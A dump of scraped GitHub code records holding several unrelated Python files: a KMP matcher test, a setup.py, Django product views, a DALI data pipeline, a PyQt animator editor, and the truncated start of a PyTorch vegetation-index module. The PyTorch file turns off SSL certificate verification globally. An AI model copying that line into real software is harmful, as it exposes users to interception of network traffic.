- next[i]\n j = next[i]\n if j < 0:\n j = 0\n break\n if len(pattern) == i+1:\n return index+1 \n return None\n\n\ndef main():\n for i in range(10000):\n target = ''.join(random.sample(string.ascii_letters + string.digits, 40))\n pattern = ''.join(random.sample(string.ascii_letters + string.digits, 2))\n ans1 = simple_match(target, pattern)\n ans2 = KMP(target, pattern)\n if ans1 != ans2:\n print('target string: {}'.format(target))\n print('pattern string: {}'.format(pattern))\n print('simple_match: {}'.format(ans1))\n print('KMP: {}'.format(ans2))\n\nif __name__ == '__main__':\n main() ","repo_name":"pancerZH/algorithm_with_python","sub_path":"str_match.py","file_name":"str_match.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"6577127899","text":"#!/usr/bin/env python\n\n\"\"\"The setup script.\"\"\"\n\nfrom setuptools import find_packages, setup\n\nwith open(\"README.md\") as readme_file:\n readme = readme_file.read()\n\nrequirements = []\n\ntest_requirements = [\n \"pytest>=3.6\",\n]\n\nsetup(\n author=\"Samarpan Rai\",\n author_email=\"samarpan-rai@live.com\",\n python_requires=\">=3.6\",\n classifiers=[\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: MIT License\",\n \"Natural Language :: English\",\n ],\n description=\"Context manager around service provided by HealthChecks for easy use\",\n install_requires=requirements,\n license=\"MIT license\",\n long_description=readme,\n long_description_content_type=\"text/markdown\",\n include_package_data=True,\n keywords=\"healthchecks_context_manager\",\n name=\"healthchecks_wrapper\",\n packages=find_packages(include=[\"healthchecks_wrapper\", \"healthchecks_wrapper.*\"]),\n test_suite=\"tests\",\n tests_require=test_requirements,\n url=\"https://github.com/samarpan-rai/healthchecks_wrapper\",\n version=\"0.1.6\",\n zip_safe=False,\n)\n","repo_name":"samarpan-rai/healthchecks_wrapper","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"94"} +{"seq_id":"70908111031","text":"from django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom apps.tables.forms import ProductForm\nfrom apps.common.models import Product\nfrom django.core.paginator import Paginator\nfrom django.contrib.auth.decorators import login_required\nfrom apps.tables.utils import product_filter\n\n# Create your views here.\n\ndef datatables(request):\n filters = product_filter(request)\n product_list = Product.objects.filter(**filters)\n form = ProductForm()\n\n page = request.GET.get('page', 1)\n paginator = Paginator(product_list, 5)\n products = paginator.page(page)\n\n if request.method == 'POST':\n form = ProductForm(request.POST)\n if form.is_valid():\n return post_request_handling(request, form)\n\n context = {\n 'segment' : 'datatables',\n 'parent' : 'apps',\n 'form' : form,\n 'products' : products\n }\n \n return render(request, 'apps/datatables.html', context)\n\n\n\n@login_required(login_url='/users/signin/')\ndef post_request_handling(request, form):\n form.save()\n return redirect(request.META.get('HTTP_REFERER'))\n\n@login_required(login_url='/users/signin/')\ndef delete_product(request, id):\n product = Product.objects.get(id=id)\n product.delete()\n return redirect(request.META.get('HTTP_REFERER'))\n\n\n@login_required(login_url='/users/signin/')\ndef update_product(request, id):\n product = Product.objects.get(id=id)\n if request.method == 'POST':\n product.name = request.POST.get('name')\n product.price = int(request.POST.get('price'))\n product.info = request.POST.get('info')\n product.save()\n return redirect(request.META.get('HTTP_REFERER'))","repo_name":"app-generator/rocket-django","sub_path":"apps/tables/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"94"} +{"seq_id":"72338515508","text":"from nvidia.dali.plugin.pytorch import DALIClassificationIterator\nfrom nvidia.dali.pipeline import Pipeline\nimport nvidia.dali.ops as ops\nimport nvidia.dali.types as types\n\n\nclass HybridTrainPipe(Pipeline):\n def __init__(self, data_dir, batch_size, num_threads=4):\n super().__init__(batch_size, num_threads, device_id=0)\n self.input = ops.FileReader(\n file_root='.', file_list='train_list', random_shuffle=True)\n self.shape = 512\n self.pre_transforms = [\n ops.nvJPEGDecoder(\n device='mixed',\n device_memory_padding=211025920,\n host_memory_padding=140544512),\n ops.Resize(\n device='gpu',\n resize_x=self.shape,\n resize_y=self.shape,\n interp_type=types.INTERP_TRIANGULAR),\n ]\n self.post_transforms = [\n ops.NormalizePermute(\n device='gpu',\n height=self.shape,\n width=self.shape,\n #mean=[105.0, 72.7, 51.8],\n #std=[255 * 6.90, 255 * 4.76, 255 * 3.38]),\n mean=[0., 0., 0.],\n std=[255., 255., 255.]),\n ]\n self.coin = ops.CoinFlip()\n self.fh_op = ops.Flip(device='gpu', horizontal=1, vertical=0)\n self.fv_op = ops.Flip(device='gpu', horizontal=0, vertical=1)\n #self.twist = ops.ColorTwist(device='gpu')\n #self.rng1 = ops.Uniform(range=(-0.1, 0.1))\n #self.rng2 = ops.Uniform(range=(0.75, 1.5))\n #self.rng3 = ops.Uniform(range=(-0.15, 0.15))\n\n def define_graph(self):\n images, labels = self.input(name='Reader')\n for transform in self.pre_transforms:\n images = transform(images)\n if self.coin():\n images = self.fh_op(images)\n if self.coin():\n images = self.fv_op(images)\n #images = self.twist(\n # images,\n # saturation=self.rng2(),\n # contrast=self.rng2(),\n # brightness=self.rng1(),\n # hue=self.rng3())\n for transform in self.post_transforms:\n images = transform(images)\n return images, labels\n\n\nclass HybridTestPipe(Pipeline):\n def __init__(self, data_dir, batch_size, num_threads=4):\n super().__init__(batch_size, num_threads, device_id=0)\n self.input = ops.FileReader(\n file_root='.', file_list='test_list', random_shuffle=True)\n self.shape = 512\n self.transforms = [\n ops.nvJPEGDecoder(device='mixed'),\n ops.Resize(\n device='gpu',\n resize_x=self.shape,\n resize_y=self.shape,\n interp_type=types.INTERP_TRIANGULAR),\n ops.NormalizePermute(\n device='gpu',\n height=self.shape,\n width=self.shape,\n #mean=[105.0, 72.7, 51.8],\n #std=[255 * 6.90, 255 * 4.76, 255 * 3.38]),\n mean=[0., 0., 0.],\n std=[255., 255., 255.]),\n ]\n\n def define_graph(self):\n images, labels = self.input(name='Reader')\n for transform in self.transforms:\n images = transform(images)\n return images, labels\n\n\ndef get_dataloaders(batch_size, _):\n def get_loader(Pipe):\n pipe = Pipe('data', batch_size, 1)\n pipe.build()\n return DALIClassificationIterator(pipe, size=pipe.epoch_size('Reader'))\n\n return get_loader(HybridTrainPipe), get_loader(HybridTestPipe)\n","repo_name":"chengscott/dlp2019","sub_path":"lab3/daliloader.py","file_name":"daliloader.py","file_ext":"py","file_size_in_byte":3202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"17366169137","text":"import random\nimport time\n\n##----------------------------------------------------------------##\nfrom gii.core import app, signals\nfrom gii.qt import QtEditorModule\n\nfrom gii.qt.IconCache import getIcon\nfrom gii.qt.controls.GenericTreeWidget import GenericTreeWidget\nfrom gii.qt.dialogs import alertMessage\nfrom gii.moai.MOAIRuntime import MOAILuaDelegate\nfrom gii.SceneEditor import SceneEditorModule, getSceneSelectionManager\nfrom gii.qt.helpers import addWidgetWithLayout, QColorF, unpackQColor\n\n##----------------------------------------------------------------##\nfrom PyQt4 import QtCore, QtGui, uic\nfrom PyQt4.QtCore import Qt\n\n##----------------------------------------------------------------##\nfrom mock import _MOCK, isMockInstance\n##----------------------------------------------------------------##\nfrom AnimatorWidget import AnimatorWidget\n##----------------------------------------------------------------##\n\ndef _getModulePath( path ):\n\timport os.path\n\treturn os.path.dirname( __file__ ) + '/' + path\n\ndef _fixDuplicatedName( names, name, id = None ):\n\tif id:\n\t\ttestName = name + '_%d' % id\n\telse:\n\t\tid = 0\n\t\ttestName = name\n\t#find duplicated name\n\tif testName in names:\n\t\treturn _fixDuplicatedName( names, name, id + 1)\n\telse:\n\t\treturn testName\n\n##----------------------------------------------------------------##\nPREVIEW_SPEED_OPTIONS = [\n\t\t( '1/10', 0.1 ),\n\t\t( '1/5', 0.2 ),\n\t\t( '1/3', 0.33 ),\n\t\t( '1/2', 0.5 ),\n\t\t( '1x', 1.0 ),\n\t\t( '1.5x', 1.5 ),\n\t\t( '2x', 2.0 ),\n\t\t( '4x', 4.0 ),\n\t\t( '10x', 10.0 ),\n]\n\n##----------------------------------------------------------------##\nclass AnimatorView( SceneEditorModule ):\n\tname = 'animator'\n\tdependency = [ 'scene_editor', 'mock' ]\n\n\tdef onLoad( self ):\n\t\t#UI\n\t\tself.windowTitle = 'Animator'\n\t\tself.window = self.requestDockWindow( 'AnimatorView',\n\t\t\ttitle = 'Animator',\n\t\t\tsize = (120,120),\n\t\t\tminSize = (120,120),\n\t\t\tdock = 'bottom'\n\t\t\t)\n\t\t\n\t\tself.widget = AnimatorWidget()\n\t\tself.window.addWidget( self.widget )\n\t\tself.toolbarTarget = self.addToolBar( 'animator_target', self.widget.toolbarTarget )\n\t\tself.toolbarClips = self.addToolBar( 'animator_clips', self.widget.toolbarClips )\n\t\tself.toolbarPlay = self.addToolBar( 'animator_play', self.widget.toolbarPlay )\n\t\tself.toolbarTrack = self.addToolBar( 'animator_track', self.widget.toolbarTrack )\n\t\t# self.toolbarEdit = self.addToolBar( 'animator_play', self.widget.toolbarEdit )\n\n\t\tsignals.connect( 'scene.close', self.onSceneClose )\n\t\tsignals.connect( 'scene.save', self.preSceneSave )\n\t\tsignals.connect( 'scene.saved', self.postSceneSave )\n\n\t\t# addWidgetWithLaytut( toolbar,\n\t\t# \tself.widget.containerEditTool )\n\t\tself.addTool( 'animator_target/change_context', label = 'Change Context', icon = 'in' )\n\t\tself.addTool( 'animator_target/save_data', label = 'Save Data', icon = 'save' )\n\n\t\tself.addTool( 'animator_clips/add_clip_group', label = 'add group', icon = 'add_folder' )\n\t\tself.addTool( 'animator_clips/add_clip', label = 'add', icon = 'add' )\n\t\tself.addTool( 'animator_clips/remove_clip', label = 'remove', icon = 'remove' )\n\t\tself.addTool( 'animator_clips/clone_clip', label = 'clone', icon = 'clone' )\n\n\n\t\tself.addTool( 'animator_play/goto_start', label = 'to start', icon = 'rewind' )\n\t\t# self.addTool( 'animator_play/prev_key', label = 'prev key', icon = 'previous' )\n\t\tself.addTool( 'animator_play/stop', label = 'stop', icon = 'stop' )\n\t\tself.addTool( 'animator_play/play', label = 'play', icon = 'play', type = 'check' )\n\t\t# self.addTool( 'animator_play/next_key', label = 'next key', icon = 'next' )\n\t\tself.addTool( 'animator_play/goto_end', label = 'to end', icon = 'fast_forward' )\n\t\tself.addTool( 'animator_play/toggle_repeat', label = 'toggle repeat', icon = 'repeat', type = 'check' )\n\t\tself.comboPreviewSpeed = QtGui.QComboBox()\n\t\tself.comboPreviewSpeed.addItems([ e[0] for e in PREVIEW_SPEED_OPTIONS ] )\t\t\t\n\t\tself.comboPreviewSpeed.setCurrentIndex( 4 ) #1x\n\t\tself.comboPreviewSpeed.currentIndexChanged.connect( self.onPreviewSpeedChange )\n\t\tself.addTool( 'animator_play/preview_speed', widget = self.comboPreviewSpeed )\n\t\t\n\t\t#SIGNALS\n\t\tself.addTool( 'animator_track/locate_target', label = 'locate', icon = 'find' )\n\t\tself.addTool( 'animator_track/----' )\n\t\tself.addTool( 'animator_track/add_track_group', label = 'add group', icon = 'add_folder' )\n\t\tself.addTool( 'animator_track/add_track', label = 'add', icon = 'add' )\n\t\tself.addTool( 'animator_track/remove_track', label = 'remove', icon = 'remove' )\n\n\t\t#\n\t\tsignals.connect( 'selection.changed', self.onSceneSelectionChanged )\n\n\t\tself.delegate = MOAILuaDelegate( self )\n\t\tself.delegate.load( _getModulePath( 'AnimatorView.lua' ) )\n\n\t\tself.widget.setOwner( self )\n\n\t\t#playback\n\t\tself.previewing = False\n\t\tself.setEditing( False )\n\n\t\tself.targetAnimator = None\n\t\tself.targetClip = None\n\t\tself.targetAnimatorData = None\n\t\tself.currentTrack = None\n\n\t\tself.previewing = False\n\t\tself.previewLoop = False\n\t\tself.previewTime = 0.0\n\t\tself.previewStep = 1.0/60.0\n\n\t\tself.previewTimer = QtCore.QTimer( self.widget )\n\t\tself.previewTimer.setInterval( 1000.0/65 )\n\t\tself.previewTimer.stop()\n\n\t\tself.previewTimer.timeout.connect( self.onPreviewTimer )\n\n\tdef onStart( self ):\n\t\tpass\n\n\tdef setEditing( self, editing ):\n\t\tself.widget.timeline.setEnabled( editing )\n\t\tself.widget.treeTracks.setEnabled( editing )\n\t\tself.findTool( 'animator_play' ).setEnabled( editing )\n\t\tself.findTool( 'animator_track' ).setEnabled( editing )\n\t\tself.findTool( 'animator_clips/add_clip_group').setEnabled( editing )\n\t\tself.findTool( 'animator_clips/add_clip' ).setEnabled( editing )\n\t\tself.findTool( 'animator_clips/remove_clip' ).setEnabled( editing )\n\t\tself.findTool( 'animator_clips/clone_clip' ).setEnabled( editing )\n\n\tdef setTargetAnimator( self, target ):\n\t\tself.saveAnimatorData()\n\t\tif target == self.targetAnimator: return\n\t\tif self.previewing:\n\t\t\tself.stopPreview()\n\t\tself.targetAnimator = target\n\t\tself.targetClip = None\n\t\tself.delegate.callMethod( 'view', 'setTargetAnimator', target )\n\t\tself.targetAnimatorData = self.delegate.callMethod( 'view', 'getTargetAnimatorData' )\n\t\tself.widget.rebuild()\n\t\tif self.targetAnimator:\n\t\t\tself.setEditing( True )\n\t\t\tsignals.emit( 'animator.start' )\n\t\telse:\n\t\t\tself.setEditing( False )\n\t\t\tsignals.emit( 'animator.stop' )\n\t\t\t\n\t\tpath = self.delegate.callMethod( 'view', 'getTargetAnimatorDataPath' )\n\t\tif path:\n\t\t\tself.window.setWindowTitle( 'Animator - %s' % path )\n\t\telse:\n\t\t\tself.window.setWindowTitle( 'Animator' )\n\t\tclip = self.delegate.callMethod( 'view', 'getPreviousTargeClip', target )\n\t\tself.enableTool( 'animator_play' , False )\n\t\tself.enableTool( 'animator_track', False )\n\t\tif clip:\n\t\t\tself.widget.treeClips.selectNode( clip )\n\t\telse:\n\t\t\tself.widget.treeClips.selectFirstItem()\n\t\tself.applyTime( 0, True )\n\n\tdef setTargetClip( self, clip ):\n\t\twasPreviewing = self.previewing\n\t\tif self.previewing:\n\t\t\tself.stopPreview()\n\n\t\tself.targetClip = clip\n\t\tself.delegate.callMethod( 'view', 'setTargetClip', clip )\n\t\tself.widget.rebuildTimeline()\n\t\tself.enableTool( 'animator_play' , bool( clip ) )\n\t\tself.enableTool( 'animator_track', bool( clip ) )\n\t\tself.applyTime( 0, True )\n\t\tif wasPreviewing:\n\t\t\tself.startPreview()\n\n\tdef setCurrentTrack( self, track ):\n\t\tself.currentTrack = track\n\t\tself.delegate.callMethod( 'view', 'setCurrentTrack', track )\n\n\tdef getTargetClipLength( self ):\n\t\treturn self.delegate.callMethod( 'view', 'getTargetClipLength' )\n\n\tdef getClipList( self ):\n\t\tif self.targetAnimatorData:\n\t\t\tclipList = self.targetAnimatorData.clips\n\t\t\treturn [ clip for clip in clipList.values() ]\n\t\telse:\n\t\t\treturn []\n\n\tdef getRootClipGroup( self ):\n\t\tif self.targetAnimatorData:\n\t\t\treturn self.targetAnimatorData.getRootGroup( self.targetAnimatorData )\n\n\tdef getTrackList( self ):\n\t\tif self.targetClip:\n\t\t\ttrackList = self.targetClip.getTrackList( self.targetClip )\n\t\t\treturn [ track for track in trackList.values() ]\n\t\telse:\n\t\t\treturn []\n\n\tdef getMarkerList( self ):\n\t\tif self.targetClip:\n\t\t\tmarkerList = self.targetClip.getMarkerList( self.targetClip )\n\t\t\treturn [ track for track in markerList.values() ]\n\t\telse:\n\t\t\treturn []\n\n\tdef getClipRoot( self ):\n\t\tif self.targetClip:\n\t\t\treturn self.targetClip.getRoot( self.targetClip )\n\t\telse:\n\t\t\treturn None\n\n\tdef addClip( self ):\n\t\tif not self.targetAnimatorData: return\n\t\ttargetGroup = self.widget.getCurrentClipGroup()\n\t\tcmd = self.doCommand( 'scene_editor/animator_add_clip',\n\t\t\tanimator_data = self.targetAnimatorData,\n\t\t\tparent_group = targetGroup\n\t\t )\n\t\tclip = cmd.getResult()\n\t\tif clip:\n\t\t\tself.widget.addClip( clip, True )\n\t\treturn clip\n\n\tdef addClipGroup( self ):\n\t\tif not self.targetAnimatorData: return\n\t\ttargetGroup = self.widget.getCurrentClipGroup()\n\t\tcmd = self.doCommand( 'scene_editor/animator_add_clip_group',\n\t\t\tanimator_data = self.targetAnimatorData,\n\t\t\tparent_group = targetGroup\n\t\t )\n\t\tgroup = cmd.getResult()\n\t\tif group:\n\t\t\tself.widget.addClip( group, True )\n\t\treturn group\n\n\tdef removeClipNode( self ):\n\t\tfor clip in self.widget.treeClips.getSelection():\n\t\t\tif self.doCommand( 'scene_editor/animator_remove_clip_node',\n\t\t\t\tanimator_data = self.targetAnimatorData,\n\t\t\t\ttarget_node = clip\n\t\t\t):\n\t\t\t\tself.widget.removeClip( clip )\n\n\tdef cloneClipNode( self ):\n\t\tif not self.targetClip: return\n\t\tresult = []\n\t\tfor clip in self.widget.treeClips.getSelection():\n\t\t\tcmd = self.doCommand( 'scene_editor/animator_clone_clip_node',\n\t\t\t\tanimator_data = self.targetAnimatorData,\n\t\t\t\ttarget_node = clip\n\t\t\t)\n\t\t\tif cmd:\n\t\t\t\tcloned = cmd.getResult()\n\t\t\t\tself.widget.addClip( cloned )\n\t\t\t\tresult.append( cloned )\n\t\treturn result\n\n\tdef onObjectEdited( self, obj ):\n\t\tif self.targetClip:\n\t\t\tself.delegate.callMethod( 'view', 'clearPreviewState' )\n\t\t\tself.delegate.callMethod( 'view', 'markClipDirty' )\n\n\tdef onSceneSelectionChanged( self, selection, key ):\n\t\tif key != 'scene': return\n\t\t#find animator component\n\t\t# self.findTargetAnimator()\n\n\tdef findTargetAnimator( self ):\n\t\ttarget = self.delegate.callMethod( 'view', 'findTargetAnimator' )\n\t\tself.setTargetAnimator( target )\n\t\treturn target\n\n\tdef checkTargetAnimator( self ):\n\t\tif not self.targetAnimator:\n\t\t\talertMessage( 'No Animator', 'No Animator Selected', 'question' )\n\t\t\treturn False\n\t\treturn True\n\n\tdef addMarker( self ):\n\t\tif not self.targetClip: return\n\t\tcmd = self.doCommand( 'scene_editor/animator_add_marker' ,\n\t\t\t\ttarget_clip = self.targetClip,\n\t\t\t\ttarget_pos = self.widget.getCursorPos()\n\t\t\t)\n\t\tif cmd:\n\t\t\tmarker = cmd.getResult()\n\t\t\tself.widget.addMarker( marker )\n\n\tdef addKeyForField( self, target, fieldId ):\n\t\tif not self.checkTargetAnimator(): return \n\n\t\tif not self.targetClip:\n\t\t\tself.addClip()\n\t\t\t# alertMessage( 'No Clip', 'You need to select a Clip first', 'question' )\n\t\t\t# return False\n\t\tkeys = self.delegate.callMethod( 'view', 'addKeyForField', target, fieldId )\n\t\tif keys:\n\t\t\tfor key in keys.values():\n\t\t\t\tself.widget.addKey( key, True )\n\n\tdef addKeyForEvent( self, target, eventId ):\n\t\tpass\n\n\tdef addCustomAnimatorTrack( self, target, trackClasId ):\n\t\tif not self.checkTargetAnimator(): return\n\t\t\t\n\t\ttrack = self.delegate.callMethod( 'view', 'addCustomAnimatorTrack', target, trackClasId )\n\t\tif track:\n\t\t\tself.widget.addTrack( track )\n\n\tdef addKeyForSelectedTracks( self ):\n\t\t#TODO: command\n\t\tselectedTracks = self.widget.getTrackSelection()\n\t\tfor track in selectedTracks:\n\t\t\tkeys = self.delegate.callMethod( 'view', 'addKeyForSelectedTrack', track )\n\t\t\tif keys:\n\t\t\t\tfor key in keys.values():\n\t\t\t\t\tself.widget.addKey( key, True )\n\n\tdef removeSelectedKeys( self ):\n\t\t#TODO: command\n\t\tselectedKeys = self.widget.getKeySelection()\n\t\tfor key in selectedKeys:\n\t\t\tself.widget.removeKey( key )\n\n\tdef cloneSelectedKeys( self ):\n\t\t#TODO: command\n\t\tselectedKeys = self.widget.getKeySelection()\n\t\tcloned = []\n\t\tfor key in selectedKeys:\n\t\t\tclonedKey = self.delegate.callMethod( 'view', 'cloneKey', key )\n\t\t\tif clonedKey:\n\t\t\t\tcloned.append( clonedKey )\n\n\t\tfor clonedKey in cloned:\n\t\t\tself.widget.addKey( clonedKey, False )\n\n\tdef onKeyRemoving( self, key ):\n\t\tif self.delegate.callMethod( 'view', 'removeKey', key ) != False:\n\t\t\treturn True\n\n\tdef onMarkerRemoving( self, marker ):\n\t\tif self.delegate.callMethod( 'view', 'removeMarker', marker ) != False:\n\t\t\treturn True\n\n\tdef onClipLengthChanging( self, t1 ):\n\t\tif self.delegate.callMethod( 'view', 'setTargetClipLength', t1 ) != False:\n\t\t\treturn True\n\n\tdef onTimelineKeyChanged( self, key, pos, length ):\n\t\tself.delegate.callMethod( 'view', 'updateTimelineKey', key, pos, length )\n\n\tdef onTimelineKeyCurveValueChanged( self, key, value ):\n\t\tself.delegate.callMethod( 'view', 'updateTimelineKeyCurveValue', key, value )\n\n\tdef onTimelineKeyTweenModeChanged( self, key, mode ):\n\t\tself.delegate.callMethod( 'view', 'updateTimelineKeyTweenMode', key, mode )\n\n\tdef onTimelineKeyBezierPointChanged( self, key, bpx0, bpy0, bpx1, bpy1 ):\n\t\tself.delegate.callMethod( 'view', 'updateTimelineKeyBezierPoint', key, bpx0, bpy0, bpx1, bpy1 )\n\n\tdef onTimelineMarkerChanged( self, marker, pos ):\n\t\tself.delegate.callMethod( 'view', 'updateTimelineMarker', marker, pos )\n\n\tdef toggleTrackActive( self, track ):\n\t\t#TODO: command\n\t\t# self.module.doCommand( 'scene_editor/toggle_entity_visibility', target = node )\n\t\tself.delegate.callMethod( 'view', 'toggleTrackActive', track )\n\n\n\tdef renameTrack( self, track, name ):\n\t\tself.delegate.callMethod( 'view', 'renameTrack', track, name )\n\n\tdef renameClip( self, clip, name ):\n\t\tself.delegate.callMethod( 'view', 'renameClip', clip, name )\n\n\tdef onTool( self, tool ):\n\t\tname = tool.name\n\t\tif name == 'change_context':\n\t\t\ttarget0 = self.targetAnimator\n\t\t\ttarget1 = self.findTargetAnimator()\n\t\t\tif ( not target0 ) and ( not target1 ):\n\t\t\t\talertMessage( 'No Animator', 'No Animator found in selected entity scope', 'question' )\n\t\t\t\t\n\t\telif name == 'save_data':\n\t\t\tself.saveAnimatorData()\n\n\t\telif name == 'add_clip':\n\t\t\tif self.checkTargetAnimator():\n\t\t\t\tself.addClip()\n\n\t\telif name == 'add_clip_group':\n\t\t\tif self.checkTargetAnimator():\n\t\t\t\tself.addClipGroup()\n\n\t\telif name == 'remove_clip':\n\t\t\tif self.checkTargetAnimator():\n\t\t\t\tself.removeClipNode()\t\t\t\n\n\t\telif name == 'clone_clip':\n\t\t\tif self.checkTargetAnimator():\n\t\t\t\tself.cloneClipNode()\t\t\t\n\n\t\telif name == 'add_track_group':\n\t\t\tgroup = self.delegate.callMethod( 'view', 'addTrackGroup' )\n\t\t\tif group:\n\t\t\t\tself.widget.addTrack( group, True )\n\n\t\telif name == 'remove_track':\n\t\t\tfor track in self.widget.treeTracks.getSelection():\n\t\t\t\tself.delegate.callMethod( 'view', 'removeTrack', track )\n\t\t\t\tself.widget.removeTrack( track )\n\t\telif name == 'locate_target':\n\t\t\tfor track in self.widget.treeTracks.getSelection():\n\t\t\t\tsceneGraphEditor = self.getModule( 'scenegraph_editor')\n\t\t\t\tif sceneGraphEditor:\n\t\t\t\t\ttargetEntity = self.delegate.callMethod( 'view', 'findTrackEntity', track )\n\t\t\t\t\tif targetEntity:\n\t\t\t\t\t\tsceneGraphEditor.selectEntity( targetEntity, focus_tree = True )\n\t\t\t\t#pass\n\t\t\t\treturn\n\n\t\t#preview\n\t\telif name == 'goto_start':\n\t\t\tself.gotoStart()\n\t\telif name == 'goto_end':\n\t\t\tself.gotoEnd()\n\t\telif name == 'play':\n\t\t\tif tool.getValue():\n\t\t\t\tself.startPreview()\n\t\t\telse:\n\t\t\t\tself.stopPreview( False )\n\t\telif name == 'stop':\n\t\t\tself.stopPreview( True )\n\t\telif name == 'toggle_repeat':\n\t\t\tself.delegate.callMethod( 'view', 'togglePreviewRepeat', tool.getValue() )\n\t\t\t\n\n\tdef getActiveSceneView( self ):\n\t\treturn self.getModule( 'scene_view' )\n\n\t#preview\n\tdef startPreview( self ):\n\t\tself.saveAnimatorData()\n\t\tif self.delegate.callMethod( 'view', 'startPreview', self.previewTime ):\n\t\t\tself.widget.setCursorMovable( False )\n\t\t\tself.previewing = True\n\t\t\tself.findTool( 'animator_play/play' ).setValue( True )\n\t\t\tself.previewTimer.start()\n\t\t\tself.getApp().setMinimalMainLoopBudget()\n\t\t\t\n\tdef stopPreview( self, rewind = False ):\t\t\n\t\tif self.previewing:\n\t\t\tself.delegate.callMethod( 'view', 'stopPreview' )\n\t\t\tself.getApp().resetMainLoopBudget()\n\t\t\tself.widget.setCursorMovable( True )\n\t\t\tself.previewing = False\n\t\t\tself.findTool( 'animator_play/play' ).setValue( False )\n\t\t\tself.previewTimer.stop()\n\t\t\tsignals.emit( 'entity.modified', None , '' )\n\t\tif rewind:\n\t\t\tself.gotoStart()\n\n\tdef onPreviewTimer( self ):\n\t\tplaying, currentTime = self.delegate.callMethod( 'view', 'doPreviewStep' )\n\t\tself.previewTime = currentTime\n\t\tself.getActiveSceneView().forceUpdate()\n\t\tself.widget.setCursorPos( self.previewTime )\n\t\tif not playing:\n\t\t\tself.stopPreview()\n\t\t# signals.emit( 'entity.modified', None , '' )\n\n\tdef gotoStart( self ):\n\t\tif self.previewing:\n\t\t\tself.delegate.callMethod( 'view', 'applyTime', 0 )\n\t\telse:\n\t\t\tself.widget.setCursorPos( 0, True )\n\n\tdef gotoEnd( self ):\n\t\tif self.previewing:\n\t\t\tself.delegate.callMethod( 'view', 'applyTime', 10 )\n\t\telse:\n\t\t\tself.widget.setCursorPos( 10, True )\n\n\tdef applyTime( self, t, syncCursor = False ):\n\t\tself.previewTime = self.delegate.callMethod( 'view', 'applyTime', t )\n\t\tself.getActiveSceneView().forceUpdate()\n\t\tsignals.emit( 'entity.modified', None , '' )\n\t\tif syncCursor:\n\t\t\tself.widget.setCursorPos( t )\n\n\tdef saveAnimatorData( self ):\n\t\tif not self.targetAnimator:\n\t\t\treturn\n\t\tself.delegate.callMethod( 'view', 'saveData' )\n\n\tdef preSceneSave( self ):\n\t\tif self.targetAnimator:\n\t\t\tself.delegate.callMethod( 'view', 'restoreEntityState' )\n\n\tdef postSceneSave( self ):\n\t\tif self.targetAnimator:\n\t\t\tself.applyTime( self.previewTime )\n\n\tdef onSceneClose( self, scene ):\n\t\tself.setTargetAnimator( None )\n\n\tdef onPreviewSpeedChange( self, index ):\n\t\tlabel, throttle = PREVIEW_SPEED_OPTIONS[ index ]\n\t\tself.delegate.callMethod( 'view', 'setPreviewThrottle', throttle )\n\n\tdef refreshTimeline( self ):\n\t\tself.widget.rebuildTimeline()\n\n\tdef refreshClipList( self ):\n\t\tself.widget.rebuildClipList()\n\n\tdef refreshAll( self ):\n\t\tself.widget.rebuild()\n","repo_name":"tommo/gii","sub_path":"packages/Mock/Animator/AnimatorView.py","file_name":"AnimatorView.py","file_ext":"py","file_size_in_byte":17792,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"94"} +{"seq_id":"3609587021","text":"import os\nimport torch.nn.functional as F\nfrom collections import OrderedDict\nfrom pretrainedmodels import se_resnext50_32x4d, se_resnext101_32x4d\nfrom lib.net.scg_gcn import *\n\nfrom enum import Enum\nimport ssl\nssl._create_default_https_context = ssl._create_unverified_context\n\nfrom torchvision.utils import save_image\n\n# assuming (N, R, G, B) order #TODO make sure RGB/BGR?\nNIR = 0\nRED = 1\nGREEN = 2\nBLUE = 3\n\nchannel_params= dict(\n NDVI = dict(alphas = torch.tensor([1, -1, 0, 0, 0, 1, 1, 0, 0, 0], dtype=torch.double), min=-1, max=1, min_clip=-1, max_clip=1),\n gNDVI = dict(alphas = torch.tensor([1, 0, -1, 0, 0, 1, 0, 1, 0, 0], dtype=torch.double), min=-1, max=1, min_clip=-1, max_clip=1),\n SAVI = dict(alphas = torch.tensor([1, -1, 0, 0, 0, 1.5, 1.5, 0, 0, 0.75], dtype=torch.double), min=-10000, max=10000, min_clip=-10000, max_clip=10000), # L = 0.5\n RVI = dict(alphas = torch.tensor([0, 1, 0, 0, 0, 1, 0, 0, 0, 0], dtype=torch.double), min=-10000, max=10000, min_clip=-10000, max_clip=10000),\n DVI = dict(alphas = torch.tensor([1, -1, 0, 0, 0, 0, 0, 0, 0, 0], dtype=torch.double), min=-1, max=1, min_clip=-1, max_clip=1),\n VDVI = dict(alphas = torch.tensor([0, -1, 2, -1, 0, 0, 1, 2, 1, 0], dtype=torch.double), min=-1, max=1, min_clip=-1, max_clip=1),\n GCC = dict(alphas = torch.tensor([0, 0, 0, 1, 0, 0, 1, 1, 1, 0], dtype=torch.double), min=0, max=1, min_clip=0, max_clip=1),\n EVI = dict(alphas = 2.5*torch.tensor([1, -1, 0, 0, 0, 1, 6, 0, -7.5, 1], dtype=torch.double), min=-10000, max=10000, min_clip=-10000, max_clip=10000),\n VARI = dict(alphas = torch.tensor([0, -1, 1, 0, 0, 0, 1, 1, -1, 0], dtype=torch.double), min=-10000, max=10000, min_clip=-10000, max_clip=10000),\n)\n\n\n\nclass AppendGenericAgriculturalIndices(nn.Module):\n \"\"\"GAI = (a0N + a1R + a2G + a3B + a4)/(a5N + a6R + a7G + a8B + a9)\"\"\"\n def __init__(self, alphas = None, epsilon=1e-7, learn=False, std=1.0, min=None, max=None, min_clip=None, max_clip=None)->None:\n super().__init__()\n # self.bn = nn.BatchNorm2d(1)\n if alphas == None:\n alphas = torch.normal(mean=0.0, std=std, size=(10, ))\n\n if learn:\n self.alphas = nn.Parameter(alphas)\n else:\n self.alphas = alphas\n \n\n self.epsilon = epsilon\n self.dim = -3\n self.min = min\n self.max = max\n self.min_clip 